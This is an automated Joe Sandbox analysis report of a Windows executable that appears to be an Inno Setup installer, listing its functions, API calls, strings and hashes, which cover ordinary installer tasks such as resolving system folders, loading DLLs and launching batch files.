String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 47109696-1093091907
Opcode ID: 7a93acda2f234d471220428d4004ddf5d74bfeca7ecd8adbdaba36eec9f3c1ba
Instruction ID: ec004eca3ef3c75e9be151f7b3ffcc37546afe520acb5c6156e930094c0c3bde
Opcode Fuzzy Hash: 7a93acda2f234d471220428d4004ddf5d74bfeca7ecd8adbdaba36eec9f3c1ba
Instruction Fuzzy Hash: CA51C630A006089FDB15DB65D941BDEB7F9EF49304F6084ABE840673A1E7786F05CB4A

Function 0047CAF0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0042D8A8: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453E28,00000000,004540DA,?,?,00000000,0049C628,00000004,00000000,00000000,00000000,?,00498A7D), ref: 0042D8BB

Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7

Part of subcall function 0042D900: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453BCE,00000000,00453C71,?,?,00000000,00000000,00000000,00000000,00000000,?,00454061,00000000), ref: 0042D91A
Part of subcall function 0042D900: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920

SHGetKnownFolderPath.SHELL32(0049AD30,00008000,00000000,?,00000000,0047CDC6), ref: 0047CCCA
CoTaskMemFree.OLE32(?,0047CD0F), ref: 0047CD02

Part of subcall function 0042D218: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA4E,00000000,0042DAE0,?,?,?,0049C628,00000000,00000000), ref: 0042D243

Strings

ProgramFilesDir, xrefs: 0047CBB8, 0047CC3F
SystemDrive, xrefs: 0047CB57
CommonFilesDir, xrefs: 0047CBF2, 0047CC6E
\Program Files, xrefs: 0047CBDF
COMMAND.COM, xrefs: 0047CDA1
Failed to get path of 64-bit Program Files directory, xrefs: 0047CC61
Common Files, xrefs: 0047CC29
cmd.exe, xrefs: 0047CD80
Failed to get path of 64-bit Common Files directory, xrefs: 0047CC90

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 3771764029-544719455
Opcode ID: c632660a73aa2456bea4c2f675731a15cac3be8b36c890987e871e9594b1d94f
Instruction ID: 266a5e1eeddd24a6ff800b9f6f3b1db768c176bc66f8c93c3bb1332691642a31
Opcode Fuzzy Hash: c632660a73aa2456bea4c2f675731a15cac3be8b36c890987e871e9594b1d94f
Instruction Fuzzy Hash: 5C61A235A00204AFDB20FBA5E882A8E7F69EB45718F50C47FE448A7395C73C9A45CB5D

Function 0047D2FC Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74A90000,SHGetFolderPathA), ref: 0047D3FE

Strings

shell32.dll, xrefs: 0047D3A9
Failed to get address of SHGetFolderPath function, xrefs: 0047D40F
SHFOLDERDLL, xrefs: 0047D33B
SHGetFolderPathA, xrefs: 0047D3F3
_isetup\_shfoldr.dll, xrefs: 0047D32E
Failed to load DLL "%s", xrefs: 0047D3E1
shfolder.dll, xrefs: 0047D361, 0047D39A
Failed to get version numbers of _shfoldr.dll, xrefs: 0047D354

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
API String ID: 190572456-1343262939
Opcode ID: 4c4f5370a674afad61a8abff597dcb6413460b1fd753ed450c61900bf845ad3d
Instruction ID: d045dd866038c92064cf829f06b82d6aceddf0eaafaeaf0ab83e85e2faf6b2a6
Opcode Fuzzy Hash: 4c4f5370a674afad61a8abff597dcb6413460b1fd753ed450c61900bf845ad3d
Instruction Fuzzy Hash: 67311B70E10149AFCB10EFA9D9819EEB7B5EF44319F50847BE848E7341D738AE058B69

Function 0040632C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00499298), ref: 00406332
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040633F
GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406355
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040636B
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00499298), ref: 00406376

Strings

SetDllDirectoryW, xrefs: 00406339
SetSearchPathMode, xrefs: 0040634F
SetProcessDEPPolicy, xrefs: 00406365
kernel32.dll, xrefs: 0040632D

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$HandleModulePolicyProcess
String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
API String ID: 3256987805-3653653586
Opcode ID: 7d7bbe465618e4585c438ef3b206e32c98bc9d4bad24831f1f4b353394e5164f
Instruction ID: 9a8e57213fbd449cbda58cf554ac4ead7a6b18060d135b7a086c7f718c4e9984
Opcode Fuzzy Hash: 7d7bbe465618e4585c438ef3b206e32c98bc9d4bad24831f1f4b353394e5164f
Instruction Fuzzy Hash: C6E02DA1380701A8EA1032B20D82F3B104C8B40B69B2A24377D96B45C7DABEDD6455BD

Function 00423884 Relevance: 15.1, APIs: 10, Instructions: 98
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2

GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
RegisterClassA.USER32(0049A630), ref: 004238C7
GetSystemMetrics.USER32(00000000), ref: 004238E9
GetSystemMetrics.USER32(00000001), ref: 004238F8
SetWindowLongA.USER32(00410470,000000FC,0042369C), ref: 00423954
SendMessageA.USER32(00410470,00000080,00000001,00000000), ref: 00423975
GetSystemMenu.USER32(00410470,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
DeleteMenu.USER32(00000000,0000F030,00000000,00410470,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410470,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410470,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
String ID:
API String ID: 183575631-0
Opcode ID: dcf1e4bb608db0b13c9ea2834524852589dee19fdd42878d22a9146a5775872e
Instruction ID: 82f3192e6ade9fc2431bdc17690f87bdde911e200ecbc62aa143bb8a1c16cd18
Opcode Fuzzy Hash: dcf1e4bb608db0b13c9ea2834524852589dee19fdd42878d22a9146a5775872e
Instruction Fuzzy Hash: A93177B17402106AE710BFA5DC82F6636989714709F54017BFA44EF2D7C6BDED40876D

Function 0042F5D4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 0042F603
GetFocus.USER32 ref: 0042F60B
RegisterClassA.USER32(0049A7AC), ref: 0042F62C
CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F700,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F66A
CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F6B0
ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F6C1
SetFocus.USER32(00000000,00000000,0042F6E3,?,?,?,00000001,00000000,?,004583FA,00000000,0049C628), ref: 0042F6C8

Strings

TWindowDisabler-Window, xrefs: 0042F663, 0042F6A9

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$CreateFocus$ActiveClassRegisterShow
String ID: TWindowDisabler-Window
API String ID: 3167913817-1824977358
Opcode ID: 329e45f8b9a76be32e2a3852da0fb01f5e5fb6a649be07f73332a055a5178ca6
Instruction ID: d29da226113d58e61871af9e0701154b32a21c5c31e3c64538275018e3c6a7a6
Opcode Fuzzy Hash: 329e45f8b9a76be32e2a3852da0fb01f5e5fb6a649be07f73332a055a5178ca6
Instruction Fuzzy Hash: 35219771740710BAE210EFA59C43F1A76B4EF04B54F91413BF504AB2E1D7B95C1587AD

Function 00453264 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004532FD,?,?,?,?,00000000,?,004992DE), ref: 00453284
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045328A
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004532FD,?,?,?,?,00000000,?,004992DE), ref: 0045329E
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004532A4

Strings

kernel32.dll, xrefs: 0045327F, 00453299
Wow64DisableWow64FsRedirection, xrefs: 0045327A
shell32.dll, xrefs: 004532D0
Wow64RevertWow64FsRedirection, xrefs: 00453294

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 8a728ce11e9b8acd7ee0e88331664095462ef5fb6b1690cb1722d2ba2dad7e7d
Instruction ID: 110c83de3d6355277510abd5b52a320a2c8dd2afbae334eef16c728cb9d202ef
Opcode Fuzzy Hash: 8a728ce11e9b8acd7ee0e88331664095462ef5fb6b1690cb1722d2ba2dad7e7d
Instruction Fuzzy Hash: 5E01DF70644645AFD300BF769C02F2A3A58E705B9BF60447BFC00A62D3CA7C8A0CCA2D

Function 00467228 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004672CB
ExtractIconA.SHELL32(00400000,00000000,?), ref: 004672F1

Part of subcall function 00467168: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467200
Part of subcall function 00467168: DestroyCursor.USER32(00000000), ref: 00467216

ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00467348
SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 004673A9
ExtractIconA.SHELL32(00400000,00000000,?), ref: 004673CF

Strings

c:\directory, xrefs: 004672C6
shell32.dll, xrefs: 0046732C

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Icon$Extract$FileInfo$CursorDestroyDraw
String ID: c:\directory$shell32.dll
API String ID: 3376378930-1375355148
Opcode ID: 8ba974db7d431cfc828555254f055e085d4bb255e1d8418bde2e11c534446a10
Instruction ID: 712749594264273e91c57dfa4baa87cbb3c5fbf3a827f6648ccfc37e71b26823
Opcode Fuzzy Hash: 8ba974db7d431cfc828555254f055e085d4bb255e1d8418bde2e11c534446a10
Instruction Fuzzy Hash: 3B515F70604204AFDB10EF65CC89FDEB7E8AB48308F1041B7F80897351D6389E80DB59

Function 004309B4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatA.USER32(commdlg_help), ref: 004309BC
RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004309CB
GetCurrentThreadId.KERNEL32 ref: 004309E5
GlobalAddAtomA.KERNEL32(00000000), ref: 00430A06

Strings

WndProcPtr%.8X%.8X, xrefs: 004309F7
commdlg_help, xrefs: 004309B7
commdlg_FindReplace, xrefs: 004309C6

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
API String ID: 4130936913-2943970505
Opcode ID: c544fb85ff372cb1e77a17e690d9a21f18419a27c2c54a515182e1a09c276035
Instruction ID: 7bf223393b5a8c163278de6a14ca069cc176d79392cc0efa73562a49209d61c7
Opcode Fuzzy Hash: c544fb85ff372cb1e77a17e690d9a21f18419a27c2c54a515182e1a09c276035
Instruction Fuzzy Hash: 2FF082709583409BC300FB6598427197BE0AB58308F00567FB458A2291E77C9900CB5F

Function 00455084 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 154COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,004552A0,004552A0,00000031,004552A0,00000000), ref: 0045522E
CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,004552A0,004552A0,00000031,004552A0), ref: 0045523B

Part of subcall function 00454FF0: WaitForInputIdle.USER32(00000001,00000032), ref: 0045501C
Part of subcall function 00454FF0: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045503E
Part of subcall function 00454FF0: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 0045504D
Part of subcall function 00454FF0: CloseHandle.KERNEL32(00000001,0045507A,00455073,?,00000031,00000080,00000000,?,?,004553D3,00000080,0000003C,00000000,004553E9), ref: 0045506D

Strings

COMMAND.COM" /C , xrefs: 00455198
.bat, xrefs: 00455114
.cmd, xrefs: 0045512F
cmd.exe" /C ", xrefs: 00455161
D, xrefs: 004551CC

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
API String ID: 854858120-615399546
Opcode ID: a12f25e84c64b35caf56505833b4763bf51916e1d96f6a3c0ca2e673e5a5c59b
Instruction ID: fd2d6d40b6f8736679a78553b36ca572aba09dccd5489fff61a9141705bf80db
Opcode Fuzzy Hash: a12f25e84c64b35caf56505833b4763bf51916e1d96f6a3c0ca2e673e5a5c59b
Instruction Fuzzy Hash: 26516D30A0071DABDF01EF95C852BEEBBB9AF44345F50407BF804B7282D7785A098B59

Function 0042369C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON

Download Yara Rule

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
OemToCharA.USER32(?,?), ref: 0042376C
CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC

Strings

MAINICON, xrefs: 00423721
2, xrefs: 004236FA

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: 2$MAINICON
API String ID: 3935243913-3181700818
Opcode ID: 72b5214bae903583b5150e9e2b4ebf56f0403f519bf97ede8b6dad9a93120e9e
Instruction ID: 6f4b3398584102735ad00b8493fe389bc1dbaef6f787fac7706901cc0cbf584f
Opcode Fuzzy Hash: 72b5214bae903583b5150e9e2b4ebf56f0403f519bf97ede8b6dad9a93120e9e
Instruction Fuzzy Hash: 23319370A042549ADF10EF69C8C57C67BE8AF14308F4441BAE844DB393D7BED988CB69

Function 00418F48 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
GetCurrentThreadId.KERNEL32 ref: 00418F89
GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA

Part of subcall function 004230D8: GetDC.USER32(00000000), ref: 0042312E
Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410470,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
Part of subcall function 004230D8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423149
Part of subcall function 004230D8: ReleaseDC.USER32(00000000,00000000), ref: 00423154

Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC

Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D

Strings

Delphi%.8X, xrefs: 00418F5F
ControlOfs%.8X%.8X, xrefs: 00418F9B

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
String ID: ControlOfs%.8X%.8X$Delphi%.8X
API String ID: 316262546-2767913252
Opcode ID: 13d9bdced9750e67f73d93ec74d54abaa35f495c5bba4d3cc3e2f323313cf858
Instruction ID: b4be2cf3334f9eeef2f7e30357217019d1f7f37f78cfa945b19fc5b38c57745f
Opcode Fuzzy Hash: 13d9bdced9750e67f73d93ec74d54abaa35f495c5bba4d3cc3e2f323313cf858
Instruction Fuzzy Hash: CE112CB06142409BC740FF66998278A7BE1AB68308F40943FF848E7291DB3DAD458B1E

Function 0041364C Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
GetWindowLongA.USER32(?,000000F0), ref: 0041367F
GetWindowLongA.USER32(?,000000F4), ref: 00413691
SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
SetPropA.USER32(?,00000000,00000000), ref: 004136BB
SetPropA.USER32(?,00000000,00000000), ref: 004136D2

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: 34b367db4fa110d3f73a4511ae8beb0e64a5e5a51f2810bc4cb64f6c76f31942
Instruction ID: 3f72449cbd34e5f3a25e72b7cfa2937fee5ee0203059de802df544128507dfad
Opcode Fuzzy Hash: 34b367db4fa110d3f73a4511ae8beb0e64a5e5a51f2810bc4cb64f6c76f31942
Instruction Fuzzy Hash: DA11CC76100244BFDF00DF99DC84E9A37E8AB19364F104266B918DB3E2D739E9909B99

